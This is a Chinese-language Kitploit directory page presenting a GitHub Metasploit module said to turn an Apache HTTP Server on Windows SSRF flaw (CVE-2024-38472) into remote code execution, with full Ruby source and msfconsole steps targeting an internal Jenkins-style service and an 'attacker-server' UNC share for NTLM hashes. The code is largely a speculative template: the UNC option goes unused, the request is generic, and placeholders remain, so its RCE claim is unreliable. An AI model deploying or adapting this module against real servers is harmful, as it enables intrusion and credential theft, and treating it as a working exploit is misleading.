Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-38472 — Metasploit模块,利用Windows上Apache HTTP Server的SSRF(CVE-2024-38472)访问内部服务并实现远程代码执行。 | Kitploit
工具/GitHubGitHub/abdurahmon3236/cve-2024-38472
渗透测试框架漏洞利用框架漏洞分析横向移动Web应用程序漏洞利用后渗透利用命令与控制红队Payload 开发
GitHubabdurahmon3236/cve-2024-38472

CVE-2024-38472

Metasploit模块,利用Windows上Apache HTTP Server的SSRF(CVE-2024-38472)访问内部服务并实现远程代码执行。

4172年前尚未审核
查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

在 Apache HTTP Server 的 Windows 版本中,为 SSRF 漏洞(CVE-2024-38472)创建一个远程代码执行(RCE)Metasploit 模块具有挑战性,因为 SSRF 本身并不能直接导致 RCE。然而,SSRF 通常可以作为实现 RCE 的一个步骤,特别是当你可以利用它与内部服务交互或触发次要漏洞时。

通过 SSRF 实现 RCE 的策略

要实现通过 SSRF 的 RCE,通常需要:

  1. 一个存在特定漏洞的内部服务,该漏洞可通过 SSRF 利用。
  2. 配置错误或额外的漏洞,允许执行任意代码。

在本示例中,假设我们可以触发一个内部服务,该服务接受 HTTP 请求并可能被骗取执行任意代码(例如 Jenkins 服务器或其他具有暴露 API 的服务)。

Metasploit 模块示例

我们将编写一个 Metasploit 模块,该模块尝试通过利用 SSRF 与内部服务交互来实现 RCE。在本例中,我们将模拟一个具有暴露脚本控制台的内部 Jenkins 服务器,该控制台可被滥用实现 RCE。

将以下代码保存为 apache_unc_ssrf_rce.rb,放在 Metasploit Framework 安装目录的 modules/exploits/multi/http 下。

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache HTTP Server Windows UNC SSRF to RCE',
      'Description'    => %q{
        This module exploits a Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows,
        which can potentially be leveraged to achieve Remote Code Execution (RCE) by interacting with internal
        services like Jenkins.
      },
      'Author'         =>
        [
          'Your Name'  # Your name or handle
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-38472'],
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'Platform'       => ['win'],
      'Arch'           => [ARCH_CMD],
      'Targets'        => [
        ['Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' }]
      ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RHOSTS,
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, "The base path to the vulnerable application", '/']),
        OptString.new('UNC_SERVER', [ true, "UNC path of the malicious server to receive NTLM hashes", '\\\\attacker-server\\share']),
        OptString.new('INTERNAL_SERVICE', [ true, "Internal service URL to exploit for RCE", 'http://internal-service/script']),
        OptString.new('CMD', [ true, "Command to execute", 'calc.exe'])
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.headers['Server'] && res.headers['Server'].include?('Apache')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    ssrf_payload = {
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path),
      'version' => '1.1',
      'headers' => {
        'Host' => datastore['RHOSTS'],
        'Content-Type' => 'application/x-www-form-urlencoded'
      },
      'data'    => "url=#{datastore['INTERNAL_SERVICE']}?script=#{Rex::Text.uri_encode(datastore['CMD'])}"
    }

    begin
      print_status("Sending SSRF request to #{datastore['RHOSTS']}:#{datastore['RPORT']}#{target_uri.path}")
      res = send_request_cgi(ssrf_payload)

      if res && res.code == 200
        print_good("Successfully triggered the internal service")
      else
        print_error("Failed to trigger the internal service: #{res.inspect}")
      end
    rescue ::Rex::ConnectionError => e
      print_error("Connection failed: #{e.message}")
    rescue ::Interrupt
      print_status("User interrupted the module execution")
    rescue ::Exception => e
      print_error("An unexpected error occurred: #{e.message}")
    end
  end
end

使用说明

  1. 保存模块: 将模块保存为 apache_unc_ssrf_rce.rb,放在 Metasploit Framework 安装目录的 modules/exploits/multi/http 下。

    /path/to/metasploit-framework/modules/exploits/multi/http/apache_unc_ssrf_rce.rb
    
  2. 加载 Metasploit: 通过打开终端并运行以下命令启动 Metasploit Framework:

    msfconsole
    
  3. 使用新模块: 在 Metasploit 控制台中,使用以下命令加载新的漏洞利用模块:

    use exploit/multi/http/apache_unc_ssrf_rce
    
  4. 配置并运行: 设置必要选项,如 RHOSTS、RPORT、TARGETURI、UNC_SERVER、INTERNAL_SERVICE 和 CMD。然后运行模块。

    msf6 > use exploit/multi/http/apache_unc_ssrf_rce
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RHOSTS target_ip
    RHOSTS => target_ip
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > set RPORT 80
    RPORT => 80
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > set TARGETURI /
    TARGETURI => /
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > set UNC_SERVER \\\\attacker-server\\share
    UNC_SERVER => \\attacker-server\share
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > set INTERNAL_SERVICE http://internal-service/script
    INTERNAL_SERVICE => http://internal-service/script
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > set CMD calc.exe
    CMD => calc.exe
    msf6 exploit(multi/http/apache_unc_ssrf_rce) > run
    

重要注意事项

  • 在测试或利用任何系统之前,请确保拥有适当的权限。
  • 本模块仅供教育和测试目的使用。在生产系统上使用之前,请务必在安全可控的环境中进行测试。

这个增强版的 Metasploit 模块向易受攻击的 Windows 版 Apache HTTP 服务器发送特制请求,尝试触发 SSRF 漏洞,并通过与内部服务交互来实现 RCE。根据漏洞的具体性质和目标环境,调整有效载荷和模块。

下载工具